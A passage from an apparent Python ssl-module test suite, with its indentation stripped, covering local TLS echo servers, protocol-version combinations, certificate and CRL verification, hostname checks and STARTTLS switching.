ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 3)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
_have_threads = False
if _have_threads: # Jython skip threading tests for now, really don't work :(
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with closing(socket.socket()) as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
